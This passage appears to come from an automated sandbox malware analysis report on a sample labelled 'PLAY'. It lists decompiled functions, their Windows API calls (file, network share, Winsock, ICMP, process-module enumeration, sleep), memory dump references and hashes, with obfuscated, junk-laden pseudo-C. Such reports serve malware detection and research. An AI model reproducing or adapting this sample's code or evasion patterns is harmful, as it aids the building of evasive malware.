          APIs
          • CreateFileW.KERNELBASE(?,?,00000000,00000000,?,?,00000000,C1579174), ref: 00AEE2CC
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: CreateFile
          • String ID:
          • API String ID: 823142352-0
          • Opcode ID: 1587099497ba7d390d4bf8bb973bd428c5695e5dae86badf894f04bf634750a2
          • Instruction ID: 24ce8f6704d09b1207c71b848086b5bbf4bd74a48b14e108204dcdf57ae79d00
          • Opcode Fuzzy Hash: 1587099497ba7d390d4bf8bb973bd428c5695e5dae86badf894f04bf634750a2
          • Instruction Fuzzy Hash: F2F0E5326401C6AFDB12CFE4EC15F5CBB61EB85310F1007AAF694664E0CB321912D780
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AE9821 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
          Download Yara Rule
          C-Code - Quality: 46%
          			E00AE9821(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t5;
				intOrPtr _t14;
				void* _t22;
				signed int _t23;

				_t20 = __esi;
				asm("adc al, 0x9e");
				asm("lahf");
				_t23 = _t22 + 1;
				asm("pushfd");
				asm("daa");
				asm("enter 0x1d82, 0x54");
				asm("aas");
				_t14 =  *0xb0d648; // 0xcafce4e7
				_t5 = E00AEDEC0(__ebx, _t14, __edi, __esi);
				 *_t5 =  *_t5 + _t5;
				FindCloseChangeNotification( *(_t23 - 0x58)); // executed
				E00AEE110(__ebx,  *((intOrPtr*)(_t23 - 0x70)), __edi, _t20); // executed
				return E00AF7B30( *(_t23 - 8) ^ _t23, _t14);
			}







          0x00ae9821
          0x00ae9821
          0x00ae9824
          0x00ae9825
          0x00ae9826
          0x00ae9827
          0x00ae9828
          0x00ae982c
          0x00ae982d
          0x00ae9833
          0x00ae9836
          0x00ae983b
          0x00ae9841
          0x00ae985c

          APIs
          • FindCloseChangeNotification.KERNELBASE(?), ref: 00AE983B
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: ChangeCloseFindNotification
          • String ID:
          • API String ID: 2591292051-0
          • Opcode ID: 91e96733838488c2bc148801727c59c4499bfc07657b8a1af33fc18ca07dc603
          • Instruction ID: ff56ebc6c03d7ad8d177bce790a024957f967b4964a7b7c6fa2774419ab1e53e
          • Opcode Fuzzy Hash: 91e96733838488c2bc148801727c59c4499bfc07657b8a1af33fc18ca07dc603
          • Instruction Fuzzy Hash: 16E08C31B1404C5BCB14EBE4EC925BDB722EF84215B40167EE5176B263CE325996CA85
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AEE343 Relevance: 1.5, APIs: 1, Instructions: 25fileCOMMON
          Download Yara Rule
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: FileRead
          • String ID:
          • API String ID: 2738559852-0
          • Opcode ID: 17fbb1c82d62a10b56519adff169e1982b03ccebd92713dec895a09786810c87
          • Instruction ID: 6875d05df4a82f3f9635de876da702ba99279452c7793b8285680240a96cc226
          • Opcode Fuzzy Hash: 17fbb1c82d62a10b56519adff169e1982b03ccebd92713dec895a09786810c87
          • Instruction Fuzzy Hash: 6CE0C23A208208BEEB019AD9AC02ADCBB22DB84261F1080A6F60895211D52351229B94
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AEE571 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
          Download Yara Rule
          APIs
          • GetFileAttributesW.KERNELBASE(?), ref: 00AEE5AB
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: AttributesFile
          • String ID:
          • API String ID: 3188754299-0
          • Opcode ID: 26ac00923fe7258a988a3c06d616f61c1cd6d140b4e209ecc38da6fd8f75e520
          • Instruction ID: 8bb35cd88a7826acd42ab118516fd0c96f8064820c7d646ff02f3acbd170a08f
          • Opcode Fuzzy Hash: 26ac00923fe7258a988a3c06d616f61c1cd6d140b4e209ecc38da6fd8f75e520
          • Instruction Fuzzy Hash: C4E0C032449346DFCB03DFF4D88358DBF32EE61200349049DDC0847502C7159418CB84
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AF3EA9 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
          Download Yara Rule
          APIs
          • IcmpCloseHandle.IPHLPAPI(?,C7E712D9), ref: 00AF3ECC
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: CloseHandleIcmp
          • String ID:
          • API String ID: 2407224122-0
          • Opcode ID: bfe582d5140af0ba5504d97cadd7f6ec6d340437ac1ea7c817cb04a01df7d77a
          • Instruction ID: cd1eeb126e7681c2975acfb605b1571cf69973f9bba38ef9a4e1186be4c4413d
          • Opcode Fuzzy Hash: bfe582d5140af0ba5504d97cadd7f6ec6d340437ac1ea7c817cb04a01df7d77a
          • Instruction Fuzzy Hash: 28E08C33B100889B8B14EAE2E9919BDB7A2EF84321B6001AAF102EB141CA211D19AA50
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AEE47B Relevance: 1.5, APIs: 1, Instructions: 18COMMON
          Download Yara Rule
          C-Code - Quality: 27%
          			E00AEE47B(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				int _t3;
				intOrPtr _t8;
				void* _t13;
				void* _t14;

				asm("adc al, 0x9e");
				asm("lahf");
				_t14 = _t13 + 1;
				asm("pushfd");
				asm("daa");
				asm("enter 0x1d82, 0x54");
				asm("aas");
				_t8 =  *0xb0d648; // 0xcafce4e7
				E00AEDEC0(__ebx, _t8, __edi, __esi);
				asm("invalid");
				_t3 = FindCloseChangeNotification( *(_t14 - 4)); // executed
				return _t3;
			}







          0x00aee47b
          0x00aee47e
          0x00aee47f
          0x00aee480
          0x00aee481
          0x00aee482
          0x00aee486
          0x00aee487
          0x00aee48d
          0x00aee490
          0x00aee495
          0x00aee49d

          APIs
          • FindCloseChangeNotification.KERNELBASE(?), ref: 00AEE495
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: ChangeCloseFindNotification
          • String ID:
          • API String ID: 2591292051-0
          • Opcode ID: 9d99473c7375ca85fb65e712317f2299f15e0f9787bf2ff4fd8dedba3c6c592a
          • Instruction ID: 85938af88bf8d9b78f608fae7e61511bf86d8fa8c5d94a41ec6362db5d12e3ff
          • Opcode Fuzzy Hash: 9d99473c7375ca85fb65e712317f2299f15e0f9787bf2ff4fd8dedba3c6c592a
          • Instruction Fuzzy Hash: 94C0803270400C56C6019BD5FC421FCB711D7C416678012B6D51A53172CE234E569145
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AEEAAB Relevance: 1.5, APIs: 1, Instructions: 17COMMON
          Download Yara Rule
          APIs
          • K32EnumProcessModules.KERNEL32(?,?,00001000,?), ref: 00AEEAC9
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: EnumModulesProcess
          • String ID:
          • API String ID: 1082081703-0
          • Opcode ID: b280adf30227feb8c95da8a8fc6e2145b5716a464d6da17480db82c93f97e512
          • Instruction ID: 536324d360add10d0ce2e003949110e738fc23468237d333980c30d0a3bc6dea
          • Opcode Fuzzy Hash: b280adf30227feb8c95da8a8fc6e2145b5716a464d6da17480db82c93f97e512
          • Instruction Fuzzy Hash: CCD0123B6040487A9F126AC5AC016DCB722EF843B2F2041A3F6585591486730A726765
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AEECAF Relevance: 1.5, APIs: 1, Instructions: 15shareCOMMON
          Download Yara Rule
          C-Code - Quality: 58%
          			E00AEECAF(void* __ebx, void* __edi, void* __esi) {
				int _t5;
				intOrPtr _t8;
				void* _t13;

				asm("aaa");
				asm("cli");
				_t8 =  *0xb0d6d0; // 0xede0e2f7
				E00AEDEC0(__ebx, _t8, __edi, __esi);
				_t5 = WNetGetUniversalNameW( *(_t13 - 4), 2,  *(_t13 + 8),  *(_t13 + 0xc)); // executed
				return _t5;
			}






          0x00aeecaf
          0x00aeecb0
          0x00aeecb1
          0x00aeecb7
          0x00aeecc7
          0x00aeeccf

          APIs
          • WNetGetUniversalNameW.MPR(?,00000002,?,?), ref: 00AEECC7
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: NameUniversal
          • String ID:
          • API String ID: 2535886617-0
          • Opcode ID: eabe06f59b9d24c8f844df01f832f5284e8e75145f755ffe277875e86f408355
          • Instruction ID: a0cd06b145c8cd38d8b730ffd788ad80f1520a259fd93b25fb047f8363068277
          • Opcode Fuzzy Hash: eabe06f59b9d24c8f844df01f832f5284e8e75145f755ffe277875e86f408355
          • Instruction Fuzzy Hash: 96C01236640148BBCF019FC5FC02D9C7722EBC4321F0040A5FA0C55060CA330A20A780
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AFBDFA Relevance: 1.5, APIs: 1, Instructions: 13COMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E00AFBDFA(void* __ecx, void* __edx, void* __esi, intOrPtr _a4) {
				void* _t4;
				void* _t6;

				if(_a4 != 0) {
					E00AFBE1B(__edx, __esi, _a4);
					_t6 = E00AFC2CE(_a4); // executed
					return _t6;
				}
				return _t4;
			}





          0x00afbe03
          0x00afbe08
          0x00afbe10
          0x00000000
          0x00afbe16
          0x00afbe18

          APIs
            • Part of subcall function 00AFBE1B: _free.LIBCMT ref: 00AFBE31
            • Part of subcall function 00AFBE1B: _free.LIBCMT ref: 00AFBE3D
            • Part of subcall function 00AFBE1B: _free.LIBCMT ref: 00AFBE48
            • Part of subcall function 00AFBE1B: _free.LIBCMT ref: 00AFBE53
            • Part of subcall function 00AFBE1B: _free.LIBCMT ref: 00AFBE5E
            • Part of subcall function 00AFBE1B: _free.LIBCMT ref: 00AFBE69
            • Part of subcall function 00AFBE1B: _free.LIBCMT ref: 00AFBE74
            • Part of subcall function 00AFBE1B: _free.LIBCMT ref: 00AFBE7F
            • Part of subcall function 00AFBE1B: _free.LIBCMT ref: 00AFBE8A
            • Part of subcall function 00AFBE1B: _free.LIBCMT ref: 00AFBE98
          • _free.LIBCMT ref: 00AFBE10
            • Part of subcall function 00AFC2CE: RtlFreeHeap.NTDLL(00000000,00000000,?,00AFB5D2), ref: 00AFC2E4
            • Part of subcall function 00AFC2CE: GetLastError.KERNEL32(?,?,00AFB5D2), ref: 00AFC2F6
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: _free$ErrorFreeHeapLast
          • String ID:
          • API String ID: 776569668-0
          • Opcode ID: 8190c1db0b91845b770320efb592846065cbfcaf193a1b5b6acab3e19abcb342
          • Instruction ID: 840e2927a74381ef8b93e449f40551a4321cf154565f8b2c13c8dc2a1c04696b
          • Opcode Fuzzy Hash: 8190c1db0b91845b770320efb592846065cbfcaf193a1b5b6acab3e19abcb342
          • Instruction Fuzzy Hash: AEC0123200820C6ADB156A91EA06AFA3BA5DB40370F208029BB08150739B3699B1D594
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AEE212 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
          Download Yara Rule
          C-Code - Quality: 75%
          			E00AEE212(intOrPtr __eax, void* __ebx, void* __edi, void* __esi) {
				int _t5;
				void* _t8;
				void* _t13;

				asm("repne outsd");
				 *0x8b249d5b = __eax;
				E00AEDEC0(__ebx, _t8, __edi, __esi);
				_t5 = FindClose( *(_t13 - 4)); // executed
				return _t5;
			}






          0x00aee212
          0x00aee214
          0x00aee21e
          0x00aee226
          0x00aee22e

          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: CloseFind
          • String ID:
          • API String ID: 1863332320-0
          • Opcode ID: 907a480b04dfafeade9c2a758ff1aa514dd162d552a29c315dc3df87ad3d2666
          • Instruction ID: 1b5cdf665aa9e95719c53a0b8c3a358fe962972c72b7dcdec699d8fe6b60332d
          • Opcode Fuzzy Hash: 907a480b04dfafeade9c2a758ff1aa514dd162d552a29c315dc3df87ad3d2666
          • Instruction Fuzzy Hash: 52C02B3B6000C4DDC700BBFABA1219CFB91FF8023130000F3D80CE0560CA230F100660
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AEF2CB Relevance: 1.5, APIs: 1, Instructions: 11networkCOMMON
          Download Yara Rule
          C-Code - Quality: 37%
          			E00AEF2CB(void* __ebx, void* __edi, void* __esi) {
				intOrPtr* _t2;
				void* _t3;
				intOrPtr _t6;
				void* _t11;

				_t6 =  *0xb0d704; // 0xca35b317
				_t2 = E00AEDEC0(__ebx, _t6, __edi, __esi);
				_t3 =  *_t2(0x202,  *((intOrPtr*)(_t11 - 4))); // executed
				return _t3;
			}







          0x00aef2cb
          0x00aef2d1
          0x00aef2de
          0x00aef2e6

          APIs
          • WSAStartup.WS2_32(00000202,?), ref: 00AEF2DE
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: Startup
          • String ID:
          • API String ID: 724789610-0
          • Opcode ID: 9eb8527ee4ff7387f90970ec6688ff765e804291229508863112932778393959
          • Instruction ID: 545c28bbe23cfe8a5f47a30ea0d8a4a8b7d205ed3f48ba28f569c9ed20ecc7e1
          • Opcode Fuzzy Hash: 9eb8527ee4ff7387f90970ec6688ff765e804291229508863112932778393959
          • Instruction Fuzzy Hash: 3CC09B37744154D6D500E7D5FD4B56CF715D7D5225B1001A7E718950E18D121D145651
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AFA6EE Relevance: 1.5, APIs: 1, Instructions: 11COMMONLIBRARYCODE
          Download Yara Rule
          C-Code - Quality: 100%
          			E00AFA6EE(intOrPtr _a4) {
				intOrPtr _v8;
				void* _t5;

				_v8 = 0;
				_t5 = E00AFC2CE(_a4); // executed
				return _t5;
			}





          0x00afa6f7
          0x00afa701
          0x00afa708

          APIs
          • _free.LIBCMT ref: 00AFA701
            • Part of subcall function 00AFC2CE: RtlFreeHeap.NTDLL(00000000,00000000,?,00AFB5D2), ref: 00AFC2E4
            • Part of subcall function 00AFC2CE: GetLastError.KERNEL32(?,?,00AFB5D2), ref: 00AFC2F6
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: ErrorFreeHeapLast_free
          • String ID:
          • API String ID: 1353095263-0
          • Opcode ID: d4b6fb851439fb137942269a8aa7f79c9b065ca367425f4b306c052dd2a18966
          • Instruction ID: 788141e3c58e147c4a6389a6199808f1a55651ae90751bbda2695f1eefca2107
          • Opcode Fuzzy Hash: d4b6fb851439fb137942269a8aa7f79c9b065ca367425f4b306c052dd2a18966
          • Instruction Fuzzy Hash: B0C04C7250020CBBDB05EB86DA06A9E7BA9DB80374F204054F95567251DAB1EE44A690
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AF6E20 Relevance: 1.4, APIs: 1, Instructions: 148COMMON
          Download Yara Rule
          APIs
          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00AF6F75
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: ErrorLast
          • String ID:
          • API String ID: 1452528299-0
          • Opcode ID: 0ebb80b8b680a30530ca013e01de97bba0bdac94ee98dfa56f72a5ea30894309
          • Instruction ID: 00604aed2b103a824431b91dbc02d6b6cda2d5d179b4fca592f7c9e1b1bb9f99
          • Opcode Fuzzy Hash: 0ebb80b8b680a30530ca013e01de97bba0bdac94ee98dfa56f72a5ea30894309
          • Instruction Fuzzy Hash: 1D415AB5D002096BDB11AFF8ED816AD7BA0FF14314F0445B5FE189B387E631D9158792
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AF751E Relevance: 1.4, APIs: 1, Instructions: 111sleepCOMMON
          Download Yara Rule
          C-Code - Quality: 19%
          			E00AF751E(signed int* __eax, signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags, long long __fp0) {
				signed char _t77;
				signed int _t90;
				signed int _t94;
				signed int* _t95;
				void* _t98;
				signed int _t120;
				signed int _t125;
				void* _t130;
				void* _t131;
				signed int _t132;
				void* _t139;
				void* _t147;
				void* _t155;
				void* _t156;
				signed int _t159;
				signed int* _t165;
				signed int _t172;
				void* _t173;
				signed int _t174;
				void* _t176;
				void* _t177;
				void* _t178;
				signed int* _t184;
				signed int* _t186;

				L0:
				while(1) {
					_t191 = __fp0;
					_t159 = __esi;
					_t155 = __edi;
					_t130 = __ecx;
					_t120 = __ebx;
					_t165 = __eax;
					asm("cld");
					if(__eflags <= 0) {
						break;
					}
					L25:
					__eflags = __ecx - __esi;
					asm("out 0x14, al");
					_push(ds);
					asm("movsd");
					asm("fldenv [edi-0x22]");
					asm("invalid");
					asm("fild dword [ebp-0x28fff275]");
					while(1) {
						L26:
						_t121 = _t120 + _t147;
						__eflags = _t120 + _t147;
						_t77 = E00AEDEC0(_t121, _t130, _t155, _t159);
						_push(0x1f4);
						L27:
						asm("ror byte [ebx+0x4d8bdc45], 1");
						asm("hlt");
						 *((char*)(_t165 - 3)) =  *((char*)(_t165 - 3)) + 3;
						 *(_t165 - 0x24) = (_t77 & 0x000000ff) * 0x68;
						_t131 = _t130 + _t130 + _t130;
						 *((intOrPtr*)(_t165 - 2)) =  *((intOrPtr*)(_t165 - 2)) + _t131;
						_t173 = _t172 - 8;
						__eflags = 0x7ffe - 0x2da2;
						if(0x7ffe <= 0x2da2) {
							_t173 = _t173 + 0x107;
						}
						L29:
						_t174 = _t173 + 8;
						L32();
						asm("invalid");
						asm("int3");
						_t132 = _t131 + 1;
						__eflags = _t132;
						0x9312e8c9(_t165);
						if(_t132 < 0) {
							L33:
							_t159 =  *(_t165 - 0x10);
							_t120 =  *(_t165 - 0x24);
							_t133 =  *(_t165 - 4) & 0x000000ff;
							 *((intOrPtr*)(_t165 - 0x4c)) = 0x7ffe + _t132 * 2;
							 *((intOrPtr*)(_t165 - 0xc)) =  *((intOrPtr*)(_t165 - 0xc)) + 0xffffffffffff8cbc;
							 *((intOrPtr*)(_t165 - 0x50)) =  *((intOrPtr*)(_t165 - 0x38)) + ( *(_t165 - 4) & 0x000000ff) + _t133 * 2;
							_t90 =  *((intOrPtr*)(_t165 - 0x18)) + 8;
							__eflags = _t90;
							do {
								L34:
								__eflags =  *((intOrPtr*)(_t90 + 4)) - 1;
								if( *((intOrPtr*)(_t90 + 4)) == 1) {
									L35:
									__eflags =  *_t90;
									_t156 = _t90 - 8;
									if( *_t90 == 0) {
										L59:
										E00AF7800(_t120, _t156,  *((intOrPtr*)(_t165 - 0x58)), _t156, _t159);
										E00AEEB70(_t120, 0xb0d5b0, _t156, _t159);
										return _t156;
									}
									L36:
									_t155 = 0x1616;
								}
								L37:
								_t147 = _t147 + 1;
								_t90 = _t90 + 0x48;
								 *((short*)(_t165 - 0x28)) = (_t120 & 0x000000ff) + _t159 + _t155;
								__eflags = _t147 - 0x80;
							} while (_t147 < 0x80);
							_t130 = 0xb0d5b0;
							E00AEEB70(_t120, 0xb0d5b0, _t155, _t159);
							 *((intOrPtr*)(_t165 - 0x12)) =  *((intOrPtr*)(_t165 - 0x12)) + 0xfffe;
							_t94 =  *((intOrPtr*)(_t165 - 0xc)) -  *((intOrPtr*)(_t165 - 8));
							__eflags = _t94;
							do {
								L39:
								_t94 = _t94 +  *(_t165 - 4);
								 *(_t165 - 5) = _t94;
								_t176 = _t174 - 0xc;
								_t147 = 0x79c9;
								__eflags = 0x79c9 - 0x3ed1;
								if(0x79c9 <= 0x3ed1) {
									_t176 = _t176 + 0x1f0;
								}
								L41:
								_t174 = _t176 + 0xc;
								L45();
							} while (__eflags < 0);
							_t172 = _t174 & 0xd5a08f8a;
							asm("outsd");
							 *((long long*)(_t155 - 0x51)) = _t191;
							asm("rol bh, cl");
							asm("invalid");
							L43:
							_t95 = _t165;
							_t165 = _t94;
							asm("cld");
							if(__eflags > 0) {
								L46:
								__eflags = _t130 - _t159;
								asm("out 0x14, al");
								_push(ds);
								asm("movsd");
								asm("fldenv [edi-0x22]");
								asm("invalid");
								asm("fild dword [ebp-0x28fff275]");
								E00AEDEC0(_t120, _t130, _t155, _t159);
								Sleep(0x1f4); // executed
								 *(_t165 - 0x10) =  *(_t165 - 0x10) - 0x2d0;
								 *((short*)(_t165 - 0x54)) =  *((short*)(_t165 - 0x54)) + 3;
								L1:
								_t177 = _t172 - 8;
								_t98 = 0x7ffe;
								if(0x7ffe <= 0x2da2) {
									_t177 = _t177 + 0x107;
								}
								_t178 = _t177 + 8;
								L7();
								asm("invalid");
								_t125 = _t120 |  *(_t120 + _t159 * 8 - 0x2433d140);
								asm("int3");
								_t139 = _t130 + 1;
								0x9312e6ed(_t165);
								if (_t139 < 0) goto L8;
								asm("bound ebp, [edi+0x240483c9]");
							} else {
								L44:
								asm("a16 int 0x70");
								asm("loop 0x74");
								asm("adc [eax], esi");
								__eflags = 0x3d + _t172;
								L45:
								 *_t172 =  *_t172 + 0x50;
								__eflags =  *_t172;
								return _t95;
							}
						} else {
							L30:
							asm("scasd");
							L31:
							_t186 = _t165;
							L32:
							 *_t186 =  *_t186 + 0x4f;
							__eflags =  *_t186;
							return 0x7ffe;
						}
						goto L61;
					}
				}
				L23:
				asm("a16 int 0x70");
				asm("loop 0x74");
				asm("adc [eax], esi");
				__eflags = 0x3d + _t184;
				 *_t184 =  *_t184 + 0x50;
				__eflags =  *_t184;
				return 0x4f96;
				goto L61;
			}



























          0x00af751e
          0x00af751e
          0x00af751e
          0x00af751e
          0x00af751e
          0x00af751e
          0x00af751e
          0x00af751e
          0x00af751f
          0x00af7520
          0x00000000
          0x00000000
          0x00af754d
          0x00af754d
          0x00af754f
          0x00af7551
          0x00af7552
          0x00af7553
          0x00af7556
          0x00af755c
          0x00af7560
          0x00af7560
          0x00af7560
          0x00af7560
          0x00af7564
          0x00af7569
          0x00af756d
          0x00af756f
          0x00af7575
          0x00af7576
          0x00af7580
          0x00af7587
          0x00af7589
